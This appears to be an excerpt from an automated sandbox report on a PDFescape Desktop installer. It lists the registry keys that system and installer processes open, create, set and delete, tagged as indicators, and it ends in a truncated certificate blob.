\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 spoolsv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe -
Processes:
MsiExec.exeMsiExec.exeMsiExec.exeMicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility MsiExec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar MsiExec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8} MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\Compatibility Flags = "32776" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
spoolsv.exesvchost.exemsiexec.exeprinter-installer-app.exeupdater-ws.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" spoolsv.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\19 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1B msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDF Tools AG spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Printers\DevModePerUser spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop printer-installer-app.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\ChooseFile = "1" printer-installer-app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1c msiexec.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache updater-ws.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\18 msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\OpenAfterConversion = "1" printer-installer-app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections updater-ws.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer printer-installer-app.exe Key created \REGISTRY\USER\.DEFAULT\Software printer-installer-app.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\17 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1C msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1d msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe -
Modifies registry class 64 IoCs
Processes:
ws.exemsiexec.exeMsiExec.exeMsiExec.exews.exeMicrosoftEdge.exeregsvr32.exeMsiExec.exeMsiExec.execreator-ws.exeMicrosoftEdgeCP.exeupdater-ws.exeMsiExec.exeMsiExec.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9E5B6507-754C-4EC8-93B3-F240C0AD05BF}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000 ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\67B9F18DED42FFD488963B21983BF6CA\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{07A165DD-6FB8-4139-8C54-3335413F8637} MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdfescape\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\MiscStatus MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9E3CC75B-DB58-4223-8D1E-160BBEF0574E}\TypeLib\Version = "1.0" ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE26400E-40B5-4863-B57D-6571B6354527} ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\74E19378919A98E4D870AE52A96DD38B msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7552FE2425C7EE0418FC6B856BC40759\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3}\ProxyStubClsid32 regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\15CFEC006269E7E429B07475FDB04919\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3C0CF171-88CC-47E5-AB25-C93AFC0E7F9A}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{322C09B5-0000-4267-8909-976D51F2FC41}\ = "IInstallItemModule" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.wwf msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{706BEFD4-71E8-48BA-9E83-6C4B1E974380} ws.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77CDE36D-0000-4223-8E25-3FFD866B17E8}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B123B077-4FE5-4944-82C7-5765380D9783} MsiExec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = adfa1d24c152d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{151CD23A-0000-4238-A15C-69CA34E0BE67}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4BD66CEF-B189-4A0E-B5B4-497510EEA230}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9AF15867-1D90-423B-9853-E99761714165}\InprocServer32\ = "C:\\Program Files\\PDFescape Desktop\\creator\\plugins\\IEAddin\\creator-ie-helper.dll" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{45A54AE2-5288-433F-B74E-B3ECB3F04CA2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" creator-ws.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cookiebot.com\Total = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39E42990-0000-4230-9F81-62B537B6B839}\Version\ = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FD0188E8-0000-49D3-BF36-2B1DB153CEC3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{869F03A3-0000-4B45-9FB1-DF6B1387AB03}\ = "IStatist" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0003DEA4-0000-40CB-B0FB-D1492CA1149F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0\0\win64\ = "C:\\Program Files\\PDFescape Desktop\\updater-ws.exe" updater-ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\InprocServer32 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\60E3EBCC127EC014D863DEFE735F7634\publisher_feature = "\x06msoffice_feature" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\7552FE2425C7EE0418FC6B856BC40759 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D55E627-0000-4791-9C81-0222A629540B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E929F467-FB53-4F9C-AE25-25C663FDDD89}\Programmable updater-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktopExcelPlugIn.Connect.1\CLSID\ = "{50F0F03A-D82F-4234-BA86-167887BB152C}" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5A1886BD-3EE1-4DDB-89C5-26D0C7C80E6D}\1.0 MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\TypeLib MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{90E5A1BE-AB4B-4CF5-B84E-A2C8CFF0DAA5}\TypeLib\ = "{159B9A1E-E6BA-4134-BBFC-A6C480193408}" ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" updater-ws.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFActiveDoc.1 MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PDFescape Desktop.exe msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{CB18B217-9E76-4AB9-B2BA-B9DCD6B4BA43}\DllSurrogate MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Mime\Database\Content Type\application/pdf MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{40FA2F96-0000-4F05-84D8-C1256EAB70A0}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AE8F3CCD-0000-4EDF-B08E-C25DCADD9BB4}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{553E3DD7-A661-4EA3-B7BF-A5EF033206F1}\1.0\FLAGS MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0179B7E8-0000-48EB-A99B-B1337DEB7F1E}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B} updater-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{50F0F03A-D82F-4234-BA86-167887BB152C}\ProgID\ = "PDFescapeDesktopExcelPlugIn.Connect.1" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{57F9206E-944A-444B-B993-9D356DAEF36C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55E8F4BD-26D8-48E8-B3E1-71EE6DD79DDF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\74E19378919A98E4D870AE52A96DD38B\SourceList\Net msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4834BE9B59156DE4AB0B66F15C3BE641\Version = "67108888" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\75E686B87A6703349A18A46BD97F5A86\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\PDFescape Desktop\\Installation\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{15D3E51C-9254-4A6F-9677-BC32AC9EB05B} ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{151CD23A-0000-4238-A15C-69CA34E0BE67}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4751E4B-B75D-4D21-92E0-DB3C6A2F4BC8}\ProxyStubClsid32 ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{322C09B5-0000-4267-8909-976D51F2FC41}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{52D88735-0000-4347-BF52-DC4A219E3A2B}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4751E4B-B75D-4D21-92E0-DB3C6A2F4BC8}\ = "_IActivationBridgeEvents" ws.exe -
Processes:
PDFescape_Desktop_Installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101